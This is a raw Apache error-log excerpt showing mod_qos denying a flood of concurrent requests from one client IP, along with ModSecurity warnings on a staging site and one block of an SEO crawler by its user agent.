[Tue May 26 19:59:32.576594 2026] [qos:error] [pid 106517:tid 106662] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTIZZc2DoU1lPnP1PmgAAAJE
[Tue May 26 19:59:32.577891 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxiwAAAEs
[Tue May 26 19:59:32.586245 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257gQAAAcY
[Tue May 26 19:59:32.591070 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTEqK9k_ZUB2Vp257ggAAAao
[Tue May 26 19:59:32.602820 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTEqK9k_ZUB2Vp257hgAAAf4
[Tue May 26 19:59:32.606699 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxjQAAAHM
[Tue May 26 19:59:32.609982 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxjwAAABA
[Tue May 26 19:59:32.613835 2026] [qos:error] [pid 93868:tid 94283] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTEqK9k_ZUB2Vp257iQAAAag
[Tue May 26 19:59:32.761446 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxkAAAABw
[Tue May 26 19:59:32.768676 2026] [qos:error] [pid 93868:tid 94315] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257kAAAAcg
[Tue May 26 19:59:32.781590 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxkQAAAFU
[Tue May 26 19:59:32.800470 2026] [qos:error] [pid 93868:tid 94281] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257kQAAAaY
[Tue May 26 19:59:32.804893 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxkgAAACA
[Tue May 26 19:59:32.807526 2026] [qos:error] [pid 93868:tid 94267] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257kwAAAZg
[Tue May 26 19:59:32.807973 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxkwAAACM
[Tue May 26 19:59:32.812795 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxlQAAAB4
[Tue May 26 19:59:32.818383 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxlgAAAD0
[Tue May 26 19:59:32.819423 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxlwAAAFM
[Tue May 26 19:59:32.912853 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxmAAAAB0
[Tue May 26 19:59:32.924650 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257lAAAAZI
[Tue May 26 19:59:32.948100 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257lgAAAcE
[Tue May 26 19:59:32.953658 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxmQAAACs
[Tue May 26 19:59:32.954828 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxmgAAAGc
[Tue May 26 19:59:32.958030 2026] [qos:error] [pid 93868:tid 94310] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257mAAAAcM
[Tue May 26 19:59:32.963670 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxmwAAACw
[Tue May 26 19:59:32.967207 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxnAAAAEM
[Tue May 26 19:59:32.968559 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxnQAAAHE
[Tue May 26 19:59:32.968820 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTGDRMqfxdEDkoszxngAAAEA
[Tue May 26 19:59:33.064224 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszxoAAAADA
[Tue May 26 19:59:33.066655 2026] [security2:error] [pid 93576:tid 93610] [remote 114.119.139.42:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "digitalgerminate.com"] [uri "/seo-company-in-meerut/"] [unique_id "ahWuTWDRMqfxdEDkoszxoQAAHx8"], referer: https://digitalgerminate.com/page-sitemap.xml
[Tue May 26 19:59:33.081091 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257nwAAAe8
[Tue May 26 19:59:33.095984 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257oAAAAd4
[Tue May 26 19:59:33.100802 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszxowAAAAo
[Tue May 26 19:59:33.104579 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszxpAAAAAA
[Tue May 26 19:59:33.108151 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257oQAAAbY
[Tue May 26 19:59:33.114291 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszxpQAAACE
[Tue May 26 19:59:33.116311 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszxpwAAAAE
[Tue May 26 19:59:33.117068 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszxqAAAAAE
[Tue May 26 19:59:33.123179 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszxqQAAAHw
[Tue May 26 19:59:33.283218 2026] [security2:error] [pid 106517:tid 106673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PcgAAAJw"]
[Tue May 26 19:59:33.285424 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PbwAAAL4"]
[Tue May 26 19:59:33.286580 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PaQAAAMA"]
[Tue May 26 19:59:33.301099 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxJQAAACo"]
[Tue May 26 19:59:33.309198 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PawAAAMc"]
[Tue May 26 19:59:33.312331 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PdgAAANw"]
[Tue May 26 19:59:33.312524 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxPAAAAG0"]
[Tue May 26 19:59:33.318102 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxOwAAAD8"]
[Tue May 26 19:59:33.324725 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PjQAAAOs"]
[Tue May 26 19:59:33.329944 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxVgAAAGg"]
[Tue May 26 19:59:33.331844 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PfQAAANk"]
[Tue May 26 19:59:33.333009 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS0qK9k_ZUB2Vp257RgAAAb4"]
[Tue May 26 19:59:33.343797 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PegAAAPc"]
[Tue May 26 19:59:33.349933 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PewAAAOw"]
[Tue May 26 19:59:33.363731 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257VwAAAaI"]
[Tue May 26 19:59:33.376648 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxVwAAAHI"]
[Tue May 26 19:59:33.376913 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PjgAAALU"]
[Tue May 26 19:59:33.387883 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxWgAAAAw"]
[Tue May 26 19:59:33.388515 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxYAAAAFw"]
[Tue May 26 19:59:33.396884 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxegAAADE"]
[Tue May 26 19:59:33.398334 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxawAAAAU"]
[Tue May 26 19:59:33.402820 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257XwAAAZ8"]
[Tue May 26 19:59:33.407380 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257ZgAAAgk"]
[Tue May 26 19:59:33.408129 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxXgAAADw"]
[Tue May 26 19:59:33.408995 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxagAAAH4"]
[Tue May 26 19:59:33.412096 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxXwAAABg"]
[Tue May 26 19:59:33.421802 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxbQAAABM"]
[Tue May 26 19:59:33.424165 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PfAAAAPE"]
[Tue May 26 19:59:33.428511 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxbAAAADo"]
[Tue May 26 19:59:33.434844 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PhwAAAKA"]
[Tue May 26 19:59:33.437815 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxcQAAAHY"]
[Tue May 26 19:59:33.448853 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PkgAAANM"]
[Tue May 26 19:59:33.567139 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx1AAAAEs
[Tue May 26 19:59:33.567407 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTWDRMqfxdEDkoszx1QAAAGU
[Tue May 26 19:59:33.567959 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx1gAAAEs
[Tue May 26 19:59:33.572779 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTYZZc2DoU1lPnP1P1AAAAJs
[Tue May 26 19:59:33.579118 2026] [qos:error] [pid 106517:tid 106702] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTYZZc2DoU1lPnP1P1QAAALg
[Tue May 26 19:59:33.584391 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx2gAAAGI
[Tue May 26 19:59:33.587487 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTYZZc2DoU1lPnP1P1gAAAM4
[Tue May 26 19:59:33.591232 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257vAAAAcE
[Tue May 26 19:59:33.591599 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTWDRMqfxdEDkoszx3QAAADI
[Tue May 26 19:59:33.604243 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx3wAAAG4
[Tue May 26 19:59:33.717780 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx4AAAAEY
[Tue May 26 19:59:33.721664 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx4QAAACU
[Tue May 26 19:59:33.723374 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx4gAAAAQ
[Tue May 26 19:59:33.723500 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx4wAAAAw
[Tue May 26 19:59:33.732952 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257vQAAAfk
[Tue May 26 19:59:33.738429 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx5AAAAF8
[Tue May 26 19:59:33.741658 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx5QAAAFw
[Tue May 26 19:59:33.744297 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257vgAAAfY
[Tue May 26 19:59:33.744923 2026] [qos:error] [pid 93868:tid 94299] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257vwAAAbg
[Tue May 26 19:59:33.757953 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx5gAAACI
[Tue May 26 19:59:33.871858 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx5wAAADE
[Tue May 26 19:59:33.873560 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx6AAAAAU
